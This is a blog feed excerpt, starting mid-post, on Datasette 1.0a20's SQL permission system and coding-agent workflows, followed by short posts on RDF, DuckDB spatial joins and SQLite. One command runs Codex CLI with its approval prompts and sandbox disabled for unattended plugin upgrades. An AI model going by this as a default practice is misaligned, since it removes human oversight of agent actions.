&lt;pre&gt;&lt;span class="pl-k"&gt;from&lt;/span&gt; &lt;span class="pl-s1"&gt;datasette&lt;/span&gt; &lt;span class="pl-k"&gt;import&lt;/span&gt; &lt;span class="pl-s1"&gt;hookimpl&lt;/span&gt;
&lt;span class="pl-k"&gt;from&lt;/span&gt; &lt;span class="pl-s1"&gt;datasette&lt;/span&gt;.&lt;span class="pl-s1"&gt;permissions&lt;/span&gt; &lt;span class="pl-k"&gt;import&lt;/span&gt; &lt;span class="pl-v"&gt;PermissionSQL&lt;/span&gt;


&lt;span class="pl-en"&gt;@&lt;span class="pl-s1"&gt;hookimpl&lt;/span&gt;&lt;/span&gt;
&lt;span class="pl-k"&gt;def&lt;/span&gt; &lt;span class="pl-en"&gt;permission_resources_sql&lt;/span&gt;(&lt;span class="pl-s1"&gt;datasette&lt;/span&gt;, &lt;span class="pl-s1"&gt;actor&lt;/span&gt;, &lt;span class="pl-s1"&gt;action&lt;/span&gt;):
    &lt;span class="pl-k"&gt;if&lt;/span&gt; &lt;span class="pl-s1"&gt;action&lt;/span&gt; &lt;span class="pl-c1"&gt;!=&lt;/span&gt; &lt;span class="pl-s"&gt;"view-table"&lt;/span&gt;:
        &lt;span class="pl-k"&gt;return&lt;/span&gt; &lt;span class="pl-c1"&gt;None&lt;/span&gt;
    &lt;span class="pl-k"&gt;if&lt;/span&gt; &lt;span class="pl-c1"&gt;not&lt;/span&gt; &lt;span class="pl-s1"&gt;actor&lt;/span&gt; &lt;span class="pl-c1"&gt;or&lt;/span&gt; &lt;span class="pl-s1"&gt;actor&lt;/span&gt;.&lt;span class="pl-c1"&gt;get&lt;/span&gt;(&lt;span class="pl-s"&gt;"id"&lt;/span&gt;) &lt;span class="pl-c1"&gt;!=&lt;/span&gt; &lt;span class="pl-s"&gt;"alice"&lt;/span&gt;:
        &lt;span class="pl-k"&gt;return&lt;/span&gt; &lt;span class="pl-c1"&gt;None&lt;/span&gt;

    &lt;span class="pl-k"&gt;return&lt;/span&gt; &lt;span class="pl-en"&gt;PermissionSQL&lt;/span&gt;(
        &lt;span class="pl-s1"&gt;sql&lt;/span&gt;&lt;span class="pl-c1"&gt;=&lt;/span&gt;&lt;span class="pl-s"&gt;"""&lt;/span&gt;
&lt;span class="pl-s"&gt;            SELECT&lt;/span&gt;
&lt;span class="pl-s"&gt;                'accounting' AS parent,&lt;/span&gt;
&lt;span class="pl-s"&gt;                'sales' AS child,&lt;/span&gt;
&lt;span class="pl-s"&gt;                1 AS allow,&lt;/span&gt;
&lt;span class="pl-s"&gt;                'alice can view accounting/sales' AS reason&lt;/span&gt;
&lt;span class="pl-s"&gt;        """&lt;/span&gt;,
    )&lt;/pre&gt;
&lt;p&gt;This hook grants the actor with ID "alice" permission to view the "sales" table in the "accounting" database.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;PermissionSQL&lt;/code&gt; object should always return four columns: a parent, child, allow (1 or 0), and a reason string for debugging.&lt;/p&gt;
&lt;p&gt;When you ask Datasette to list the resources an actor can access for a specific action, it will combine the SQL returned by all installed plugins into a single query that joins against &lt;a href="https://docs.datasette.io/en/latest/internals.html#internal-database-schema"&gt;the internal catalog tables&lt;/a&gt; and efficiently lists all the resources the actor can access.&lt;/p&gt;
&lt;p&gt;This query can then be limited or paginated to avoid loading too many results at once.&lt;/p&gt;
&lt;h4 id="hierarchies-plugins-vetoes-and-restrictions"&gt;Hierarchies, plugins, vetoes, and restrictions&lt;/h4&gt;
&lt;p&gt;Datasette has several additional requirements that make the permissions system more complicated.&lt;/p&gt;
&lt;p&gt;Datasette permissions can optionally act against a two-level &lt;strong&gt;hierarchy&lt;/strong&gt;. You can grant a user the ability to insert-row against a specific table, or every table in a specific database, or every table in &lt;em&gt;every&lt;/em&gt; database in that Datasette instance.&lt;/p&gt;
&lt;p&gt;Some actions can apply at the table level, others the database level and others only make sense globally - enabling a new feature that isn't tied to tables or databases, for example.&lt;/p&gt;
&lt;p&gt;Datasette currently has &lt;a href="https://docs.datasette.io/en/latest/authentication.html#built-in-actions"&gt;ten default actions&lt;/a&gt; but &lt;strong&gt;plugins&lt;/strong&gt; that add additional features can &lt;a href="https://docs.datasette.io/en/latest/plugin_hooks.html#register-actions-datasette"&gt;register new actions&lt;/a&gt; to better participate in the permission systems.&lt;/p&gt;
&lt;p&gt;Datasette's permission system has a mechanism to &lt;strong&gt;veto&lt;/strong&gt; permission checks - a plugin can return a deny for a specific permission check which will override any allows. This needs to be hierarchy-aware - a deny at the database level can be outvoted by an allow at the table level.&lt;/p&gt;
&lt;p&gt;Finally, Datasette includes a mechanism for applying additional &lt;strong&gt;restrictions&lt;/strong&gt; to a request. This was introduced for Datasette's API - it allows a user to create an API token that can act on their behalf but is only allowed to perform a subset of their capabilities - just reading from two specific tables, for example. Restrictions are &lt;a href="https://docs.datasette.io/en/latest/authentication.html#restricting-the-actions-that-a-token-can-perform"&gt;described in more detail&lt;/a&gt; in the documentation.&lt;/p&gt;
&lt;p&gt;That's a lot of different moving parts for the new implementation to cover.&lt;/p&gt;
&lt;h4 id="new-debugging-tools"&gt;New debugging tools&lt;/h4&gt;
&lt;p&gt;Since permissions are critical to the security of a Datasette deployment it's vital that they are as easy to understand and debug as possible.&lt;/p&gt;
&lt;p&gt;The new alpha adds several new debugging tools, including this page that shows the full list of resources matching a specific action for the current user:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2025/datasette-allowed-resources.jpg" alt="Allowed resources. Tabs are Playground, Check, Allowed, Rules, Actions, Allow debug. There is a form where you can select an action (here view-table) and optionally filter by parent and child. Below is a table of results listing resource paths - e.g. /fixtures/name-of-table - plus parent, child and reason columns. The reason is a JSON list for example &amp;quot;datasette.default_permissions: root user&amp;quot;,&amp;quot;datasette.default_permissions: default allow for view-table&amp;quot;." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;And this page listing the &lt;em&gt;rules&lt;/em&gt; that apply to that question - since different plugins may return different rules which get combined together:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2025/datasette-rules.jpg" alt="The rules tab for the same view-table question. Here there are two allow rules - one from datasette.default_permissions for the root user and another from default_permissions labelled default allow for view-table." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;This screenshot illustrates two of Datasette's built-in rules: there is a default allow for read-only operations such as view-table (which can be over-ridden by plugins) and another rule that says the root user can do anything (provided Datasette was started with the &lt;code&gt;--root&lt;/code&gt; option.)&lt;/p&gt;
&lt;p&gt;Those rules are defined in the &lt;a href="https://github.com/simonw/datasette/blob/1.0a20/datasette/default_permissions.py"&gt;datasette/default_permissions.py&lt;/a&gt; Python module.&lt;/p&gt;
&lt;h4 id="the-missing-feature-list-actors-who-can-act-on-this-resource"&gt;The missing feature: list actors who can act on this resource&lt;/h4&gt;
&lt;p&gt;There's one question that the new system cannot answer: provide a full list of actors who can perform this action against this resource.&lt;/p&gt;
&lt;p&gt;It's not possibly to provide this globally for Datasette because Datasette doesn't have a way to track what "actors" exist in the system. SSO plugins such as &lt;code&gt;datasette-auth-github&lt;/code&gt; mean a new authenticated GitHub user might show up at any time, with the ability to perform actions despite the Datasette system never having encountered that particular username before.&lt;/p&gt;
&lt;p&gt;API tokens and actor restrictions come into play here as well. A user might create a signed API token that can perform a subset of actions on their behalf - the existence of that token can't be predicted by the permissions system.&lt;/p&gt;
&lt;p&gt;This is a notable omission, but it's also quite common in other systems. AWS cannot provide a list of all actors who have permission to access a specific S3 bucket, for example - presumably for similar reasons.&lt;/p&gt;
&lt;h4 id="upgrading-plugins-for-datasette-1-0a20"&gt;Upgrading plugins for Datasette 1.0a20&lt;/h4&gt;
&lt;p&gt;Datasette's plugin ecosystem is the reason I'm paying so much attention to ensuring Datasette 1.0 has a stable API. I don't want plugin authors to need to chase breaking changes once that 1.0 release is out.&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://docs.datasette.io/en/latest/upgrade_guide.html"&gt;Datasette upgrade guide&lt;/a&gt; includes detailed notes on upgrades that are needed between the 0.x and 1.0 alpha releases. I've added an extensive section about the permissions changes to that document.&lt;/p&gt;
&lt;p&gt;I've also been experimenting with dumping those instructions directly into coding agent tools - Claude Code and Codex CLI - to have them upgrade existing plugins for me. This has been working &lt;em&gt;extremely well&lt;/em&gt;. I've even had Claude Code &lt;a href="https://github.com/simonw/datasette/commit/fa978ec1006297416e2cd87a2f0d3cac99283cf8"&gt;update those notes itself&lt;/a&gt; with things it learned during an upgrade process!&lt;/p&gt;
&lt;p&gt;This is greatly helped by the fact that every single Datasette plugin has an automated test suite that demonstrates the core functionality works as expected. Coding agents can use those tests to verify that their changes have had the desired effect.&lt;/p&gt;
&lt;p&gt;I've also been leaning heavily on &lt;code&gt;uv&lt;/code&gt; to help with the upgrade process. I wrote myself two new helper scripts - &lt;code&gt;tadd&lt;/code&gt; and &lt;code&gt;radd&lt;/code&gt; - to help test the new plugins.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;tadd&lt;/code&gt; = "test against datasette dev" - it runs a plugin's existing test suite against the current development version of Datasette checked out on my machine. It passes extra options through to &lt;code&gt;pytest&lt;/code&gt; so I can run &lt;code&gt;tadd -k test_name&lt;/code&gt; or &lt;code&gt;tadd -x --pdb&lt;/code&gt; as needed.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;radd&lt;/code&gt; = "run against datasette dev" - it runs the latest dev &lt;code&gt;datasette&lt;/code&gt; command with the plugin installed.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The &lt;code&gt;tadd&lt;/code&gt; and &lt;code&gt;radd&lt;/code&gt; implementations &lt;a href="https://til.simonwillison.net/python/uv-tests#variants-tadd-and-radd"&gt;can be found in this TIL&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Some of my plugin upgrades have become a one-liner to the &lt;code&gt;codex exec&lt;/code&gt; command, which runs OpenAI Codex CLI with a prompt without entering interactive mode:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;codex &lt;span class="pl-c1"&gt;exec&lt;/span&gt; --dangerously-bypass-approvals-and-sandbox \
&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;Run the command tadd and look at the errors and then&lt;/span&gt;
&lt;span class="pl-s"&gt;read ~/dev/datasette/docs/upgrade-1.0a20.md and apply&lt;/span&gt;
&lt;span class="pl-s"&gt;fixes and run the tests again and get them to pass&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;There are still a bunch more to go - there's &lt;a href="https://github.com/simonw/datasette/issues/2577"&gt;a list in this tracking issue&lt;/a&gt; - but I expect to have the plugins I maintain all upgraded pretty quickly now that I have a solid process in place.&lt;/p&gt;
&lt;h4 id="using-claude-code-to-implement-this-change"&gt;Using Claude Code to implement this change&lt;/h4&gt;
&lt;p&gt;This change to Datasette core &lt;em&gt;by far&lt;/em&gt; the most ambitious piece of work I've ever attempted using a coding agent.&lt;/p&gt;
&lt;p&gt;Last year I agreed with the prevailing opinion that LLM assistance was much more useful for greenfield coding tasks than working on existing codebases. The amount you could usefully get done was greatly limited by the need to fit the entire codebase into the model's context window.&lt;/p&gt;
&lt;p&gt;Coding agents have entirely changed that calculation. Claude Code and Codex CLI still have relatively limited token windows - albeit larger than last year - but their ability to search through the codebase, read extra files on demand and "reason" about the code they are working with has made them vastly more capable.&lt;/p&gt;
&lt;p&gt;I no longer see codebase size as a limiting factor for how useful they can be.&lt;/p&gt;
&lt;p&gt;I've also spent enough time with Claude Sonnet 4.5 to build a weird level of trust in it. I can usually predict exactly what changes it will make for a prompt. If I tell it "extract this code into a separate function" or "update every instance of this pattern" I know it's likely to get it right.&lt;/p&gt;
&lt;p&gt;For something like permission code I still review everything it does, often by watching it as it works since it displays diffs in the UI.&lt;/p&gt;
&lt;p&gt;I also pay extremely close attention to the tests it's writing. Datasette 1.0a19 already had 1,439 tests, many of which exercised the existing permission system. 1.0a20 increases that to 1,583 tests. I feel very good about that, especially since most of the existing tests continued to pass without modification.&lt;/p&gt;
&lt;h4 id="starting-with-a-proof-of-concept"&gt;Starting with a proof-of-concept&lt;/h4&gt;
&lt;p&gt;I built several different proof-of-concept implementations of SQL permissions before settling on the final design. My &lt;a href="https://github.com/simonw/research/tree/main/sqlite-permissions-poc"&gt;research/sqlite-permissions-poc&lt;/a&gt; project was the one that finally convinced me of a viable approach,&lt;/p&gt;
&lt;p&gt;That one started as a &lt;a href="https://claude.ai/share/8fd432bc-a718-4883-9978-80ab82a75c87"&gt;free ranging conversation with Claude&lt;/a&gt;, at the end of which I told it to generate a specification which I then &lt;a href="https://chatgpt.com/share/68f6532f-9920-8006-928a-364e15b6e9ef"&gt;fed into GPT-5&lt;/a&gt; to implement. You can see that specification &lt;a href="https://github.com/simonw/research/tree/main/sqlite-permissions-poc#original-prompt"&gt;at the end of the README&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I later fed the POC itself into Claude Code and had it implement the first version of the new Datasette system based on that previous experiment.&lt;/p&gt;
&lt;p&gt;This is admittedly a very weird way of working, but it helped me finally break through on a problem that I'd been struggling with for months.&lt;/p&gt;
&lt;h4 id="miscellaneous-tips-i-picked-up-along-the-way"&gt;Miscellaneous tips I picked up along the way&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;When working on anything relating to plugins it's vital to have at least a few real plugins that you upgrade in lock-step with the core changes. The &lt;code&gt;tadd&lt;/code&gt; and &lt;code&gt;radd&lt;/code&gt; shortcuts were invaluable for productively working on those plugins while I made changes to core.&lt;/li&gt;
&lt;li&gt;Coding agents make experiments &lt;em&gt;much&lt;/em&gt; cheaper. I threw away so much code on the way to the final implementation, which was psychologically easier because the cost to create that code in the first place was so low.&lt;/li&gt;
&lt;li&gt;Tests, tests, tests. This project would have been impossible without that existing test suite. The additional tests we built along the way give me confidence that the new system is as robust as I need it to be.&lt;/li&gt;
&lt;li&gt;Claude writes good commit messages now! I finally gave in and let it write these - previously I've been determined to write them myself. It's a big time saver to be able to say "write a tasteful commit message for these changes".&lt;/li&gt;
&lt;li&gt;Claude is also great at breaking up changes into smaller commits. It can also productively rewrite history to make it easier to follow, especially useful if you're still working in a branch.&lt;/li&gt;
&lt;li&gt;A really great way to review Claude's changes is with the GitHub PR interface. You can attach comments to individual lines of code and then later prompt Claude like this: &lt;code&gt;Use gh CLI to fetch comments on URL-to-PR and make the requested changes&lt;/code&gt;. This is a very quick way to apply little nitpick changes - rename this function, refactor this repeated code, add types here etc.&lt;/li&gt;
&lt;li&gt;The code I write with LLMs is &lt;em&gt;higher quality code&lt;/em&gt;. I usually find myself making constant trade-offs while coding: this function would be neater if I extracted this helper, it would be nice to have inline documentation here, this changing this would be good but would break a dozen tests... for each of those I have to determine if the additional time is worth the benefit. Claude can apply changes so much faster than me that these calculations have changed - almost any improvement is worth applying, no matter how trivial, because the time cost is so low.&lt;/li&gt;
&lt;li&gt;Internal tools are cheap now. The new debugging interfaces were mostly written by Claude and are significantly nicer to use and look at than the hacky versions I would have knocked out myself, if I had even taken the extra time to build them.&lt;/li&gt;
&lt;li&gt;That trick with a Markdown file full of upgrade instructions works astonishingly well - it's the same basic idea as &lt;a href="https://simonwillison.net/2025/Oct/16/claude-skills/"&gt;Claude Skills&lt;/a&gt;. I maintain over 100 Datasette plugins now and I expect I'll be automating all sorts of minor upgrades in the future using this technique.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="what-s-next-"&gt;What's next?&lt;/h4&gt;
&lt;p&gt;Now that the new alpha is out my focus is upgrading the existing plugin ecosystem to use it, and supporting other plugin authors who are doing the same.&lt;/p&gt;
&lt;p&gt;The new permissions system unlocks some key improvements to Datasette Cloud concerning finely-grained permissions for larger teams, so I'll be integrating the new alpha there this week.&lt;/p&gt;
&lt;p&gt;This is the single biggest backwards-incompatible change required before Datasette 1.0. I plan to apply the lessons I learned from this project to the other, less intimidating changes. I'm hoping this can result in a final 1.0 release before the end of the year!&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/plugins"&gt;plugins&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/annotated-release-notes"&gt;annotated-release-notes&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/uv"&gt;uv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/coding-agents"&gt;coding-agents&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude-code"&gt;claude-code&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/codex-cli"&gt;codex-cli&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="plugins"/><category term="projects"/><category term="python"/><category term="sql"/><category term="sqlite"/><category term="datasette"/><category term="annotated-release-notes"/><category term="uv"/><category term="coding-agents"/><category term="claude-code"/><category term="codex-cli"/></entry><entry><title>Quoting IanCal</title><link href="https://simonwillison.net/2025/Sep/6/iancal/#atom-tag" rel="alternate"/><published>2025-09-06T06:41:49+00:00</published><updated>2025-09-06T06:41:49+00:00</updated><id>https://simonwillison.net/2025/Sep/6/iancal/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://news.ycombinator.com/item?id=45135302#45135852"&gt;&lt;p&gt;RDF has the same problems as the SQL schemas with information scattered. What fields mean requires documentation.&lt;/p&gt;
&lt;p&gt;There - they have a name on a person. What name? Given? Legal? Chosen? Preferred for this use case?&lt;/p&gt;
&lt;p&gt;You only have one ID for Apple eh? Companies are complex to model, do you mean Apple just as someone would talk about it? The legal structure of entities that underpins all major companies, what part of it is referred to?&lt;/p&gt;
&lt;p&gt;I spent a long time building identifiers for universities and companies (which was taken for &lt;a href="https://ror.org/"&gt;ROR&lt;/a&gt; later) and it was a nightmare to say what a university even was. What’s the name of Cambridge? It’s not “Cambridge University” or “The university of Cambridge” legally. But it also is the actual name as people use it. &lt;em&gt;[It's &lt;a href="https://www.cam.ac.uk/about-the-university/how-the-university-and-colleges-work/the-university-as-a-charity"&gt;The Chancellor, Masters, and Scholars of the University of Cambridge&lt;/a&gt;]&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The university of Paris went from something like 13 institutes to maybe one to then a bunch more. Are companies locations at their headquarters? Which headquarters?&lt;/p&gt;
&lt;p&gt;Someone will suggest modelling to solve this but here lies the biggest problem:&lt;/p&gt;
&lt;p&gt;The correct modelling depends on &lt;em&gt;the questions you want to answer&lt;/em&gt;.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://news.ycombinator.com/item?id=45135302#45135852"&gt;IanCal&lt;/a&gt;, on Hacker News, discussing RDF&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/metadata"&gt;metadata&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/hacker-news"&gt;hacker-news&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/rdf"&gt;rdf&lt;/a&gt;&lt;/p&gt;



</summary><category term="metadata"/><category term="sql"/><category term="hacker-news"/><category term="rdf"/></entry><entry><title>Spatial Joins in DuckDB</title><link href="https://simonwillison.net/2025/Aug/23/spatial-joins-in-duckdb/#atom-tag" rel="alternate"/><published>2025-08-23T21:21:02+00:00</published><updated>2025-08-23T21:21:02+00:00</updated><id>https://simonwillison.net/2025/Aug/23/spatial-joins-in-duckdb/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://duckdb.org/2025/08/08/spatial-joins"&gt;Spatial Joins in DuckDB&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Extremely detailed overview by Max Gabrielsson of DuckDB's new spatial join optimizations.&lt;/p&gt;
&lt;p&gt;Consider the following query, which counts the number of &lt;a href="https://citibikenyc.com/system-data"&gt;NYC Citi Bike Trips&lt;/a&gt; for each of the neighborhoods defined by the &lt;a href="https://www.nyc.gov/content/planning/pages/resources/datasets/neighborhood-tabulation"&gt;NYC Neighborhood Tabulation Areas polygons&lt;/a&gt; and returns the top three:&lt;/p&gt;
&lt;pre&gt;&lt;span class="pl-k"&gt;SELECT&lt;/span&gt; neighborhood,
  &lt;span class="pl-c1"&gt;count&lt;/span&gt;(&lt;span class="pl-k"&gt;*&lt;/span&gt;) &lt;span class="pl-k"&gt;AS&lt;/span&gt; num_rides
&lt;span class="pl-k"&gt;FROM&lt;/span&gt; rides
&lt;span class="pl-k"&gt;JOIN&lt;/span&gt; hoods &lt;span class="pl-k"&gt;ON&lt;/span&gt; ST_Intersects(
  &lt;span class="pl-c1"&gt;rides&lt;/span&gt;.&lt;span class="pl-c1"&gt;start_geom&lt;/span&gt;, &lt;span class="pl-c1"&gt;hoods&lt;/span&gt;.&lt;span class="pl-c1"&gt;geom&lt;/span&gt;
)
&lt;span class="pl-k"&gt;GROUP BY&lt;/span&gt; neighborhood
&lt;span class="pl-k"&gt;ORDER BY&lt;/span&gt; num_rides &lt;span class="pl-k"&gt;DESC&lt;/span&gt;
&lt;span class="pl-k"&gt;LIMIT&lt;/span&gt; &lt;span class="pl-c1"&gt;3&lt;/span&gt;;&lt;/pre&gt;

&lt;p&gt;The rides table contains 58,033,724 rows. The hoods table has polygons for 310 neighborhoods.&lt;/p&gt;
&lt;p&gt;Without an optimized spatial joins this query requires a nested loop join, executing that expensive &lt;code&gt;ST_Intersects()&lt;/code&gt; operation 58m * 310 ~= 18 billion times. This took around 30 minutes on the 36GB MacBook M3 Pro used for the benchmark.&lt;/p&gt;
&lt;p&gt;The first optimization described - implemented from DuckDB 1.2.0 onwards - uses a "piecewise merge join". This takes advantage of the fact that a bounding box intersection is a whole lot faster to calculate, especially if you pre-cache the bounding box (aka the minimum bounding rectangle or MBR) in the stored binary &lt;code&gt;GEOMETRY&lt;/code&gt; representation.&lt;/p&gt;
&lt;p&gt;Rewriting the query to use a fast bounding box intersection and then only running the more expensive &lt;code&gt;ST_Intersects()&lt;/code&gt; filters on those matches drops the runtime from 1800 seconds to 107 seconds.&lt;/p&gt;
&lt;p&gt;The second optimization, added in &lt;a href="https://duckdb.org/2025/05/21/announcing-duckdb-130.html"&gt;DuckDB 1.3.0&lt;/a&gt; in May 2025 using the new SPATIAL_JOIN operator, is significantly more sophisticated.&lt;/p&gt;
&lt;p&gt;DuckDB can now identify when a spatial join is working against large volumes of data and automatically build an in-memory R-Tree of bounding boxes for the larger of the two tables being joined.&lt;/p&gt;
&lt;p&gt;This new R-Tree further accelerates the bounding box intersection part of the join, and drops the runtime down to just 30 seconds.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://bsky.app/profile/mackaszechno.bsky.social/post/3lx3lnagg7s2t"&gt;@mackaszechno.bsky.social&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/geospatial"&gt;geospatial&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/duckdb"&gt;duckdb&lt;/a&gt;&lt;/p&gt;



</summary><category term="geospatial"/><category term="sql"/><category term="duckdb"/></entry><entry><title>TIL: SQLite triggers</title><link href="https://simonwillison.net/2025/May/10/til-sqlite-triggers/#atom-tag" rel="alternate"/><published>2025-05-10T05:20:45+00:00</published><updated>2025-05-10T05:20:45+00:00</updated><id>https://simonwillison.net/2025/May/10/til-sqlite-triggers/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://til.simonwillison.net/sqlite/sqlite-triggers"&gt;TIL: SQLite triggers&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I've been doing some work with SQLite triggers recently while working on &lt;a href="https://github.com/simonw/sqlite-chronicle"&gt;sqlite-chronicle&lt;/a&gt;, and I decided I needed a single reference to exactly which triggers are executed for which SQLite actions and what data is available within those triggers.&lt;/p&gt;
&lt;p&gt;I wrote this &lt;a href="https://github.com/simonw/til/blob/main/sqlite/triggers.py"&gt;triggers.py&lt;/a&gt; script to output as much information about triggers as possible, then wired it into a TIL article using &lt;a href="https://cog.readthedocs.io/"&gt;Cog&lt;/a&gt;. The Cog-powered source code for the TIL article &lt;a href="https://github.com/simonw/til/blob/main/sqlite/sqlite-triggers.md?plain=1"&gt;can be seen here&lt;/a&gt;.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/til"&gt;til&lt;/a&gt;&lt;/p&gt;



</summary><category term="python"/><category term="sql"/><category term="sqlite"/><category term="til"/></entry><entry><title>SQLite CREATE TABLE: The DEFAULT clause</title><link href="https://simonwillison.net/2025/May/8/sqlite-create-table-default-timestamp/#atom-tag" rel="alternate"/><published>2025-05-08T22:37:44+00:00</published><updated>2025-05-08T22:37:44+00:00</updated><id>https://simonwillison.net/2025/May/8/sqlite-create-table-default-timestamp/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.sqlite.org/lang_createtable.html#the_default_clause"&gt;SQLite CREATE TABLE: The DEFAULT clause&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
If your SQLite create table statement includes a line like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE alerts (
    -- ...
    alert_created_at text default current_timestamp
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;current_timestamp&lt;/code&gt; will be replaced with a UTC timestamp in the format &lt;code&gt;2025-05-08 22:19:33&lt;/code&gt;. You can also use &lt;code&gt;current_time&lt;/code&gt; for &lt;code&gt;HH:MM:SS&lt;/code&gt; and &lt;code&gt;current_date&lt;/code&gt; for &lt;code&gt;YYYY-MM-DD&lt;/code&gt;, again using UTC.&lt;/p&gt;
&lt;p&gt;Posting this here because I hadn't previously noticed that this defaults to UTC, which is a useful detail. It's also a strong vote in favor of &lt;code&gt;YYYY-MM-DD HH:MM:SS&lt;/code&gt; as a string format for use with SQLite, which &lt;a href="https://www.sqlite.org/lang_datefunc.html"&gt;doesn't otherwise provide&lt;/a&gt; a formal datetime type.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/datetime"&gt;datetime&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;&lt;/p&gt;



</summary><category term="datetime"/><category term="sql"/><category term="sqlite"/></entry><entry><title>DuckDB is Probably the Most Important Geospatial Software of the Last Decade</title><link href="https://simonwillison.net/2025/May/4/duckdb-is-probably-the-most-important-geospatial-software-of-the/#atom-tag" rel="alternate"/><published>2025-05-04T00:28:35+00:00</published><updated>2025-05-04T00:28:35+00:00</updated><id>https://simonwillison.net/2025/May/4/duckdb-is-probably-the-most-important-geospatial-software-of-the/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.dbreunig.com/2025/05/03/duckdb-is-the-most-impactful-geospatial-software-in-a-decade.html"&gt;DuckDB is Probably the Most Important Geospatial Software of the Last Decade&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Drew Breunig argues that the ease of installation of DuckDB is opening up geospatial analysis to a whole new set of developers.&lt;/p&gt;
&lt;p&gt;This inspired &lt;a href="https://news.ycombinator.com/item?id=43881468#43882914"&gt;a comment on Hacker News&lt;/a&gt; from DuckDB Labs geospatial engineer Max Gabrielsson which helps explain why the drop in friction introduced by DuckDB is so significant:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I think a big part is that duckdbs spatial extension provides a SQL interface to a whole suite of standard foss gis packages by statically bundling everything (including inlining the default PROJ database of coordinate projection systems into the binary) and providing it for multiple platforms (including WASM). I.E there are no transitive dependencies except libc.&lt;/p&gt;
&lt;p&gt;[...] the fact that you can e.g. convert too and from a myriad of different geospatial formats by utilizing GDAL, transforming through SQL, or pulling down the latest overture dump without having the whole workflow break just cause you updated QGIS has probably been the main killer feature for a lot of the early adopters.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I've lost count of the time I've spent fiddling with dependencies like GDAL trying to get various geospatial tools to work in the past. Bundling difficult dependencies statically is an under-appreciated trick!&lt;/p&gt;
&lt;p&gt;If the bold claim in the headline inspires you to provide a counter-example, bear in mind that a decade ago is 2015, and most of the key technologies
In the modern geospatial stack - QGIS, PostGIS, geopandas, SpatiaLite - predate that by quite a bit.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/geospatial"&gt;geospatial&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/duckdb"&gt;duckdb&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/drew-breunig"&gt;drew-breunig&lt;/a&gt;&lt;/p&gt;



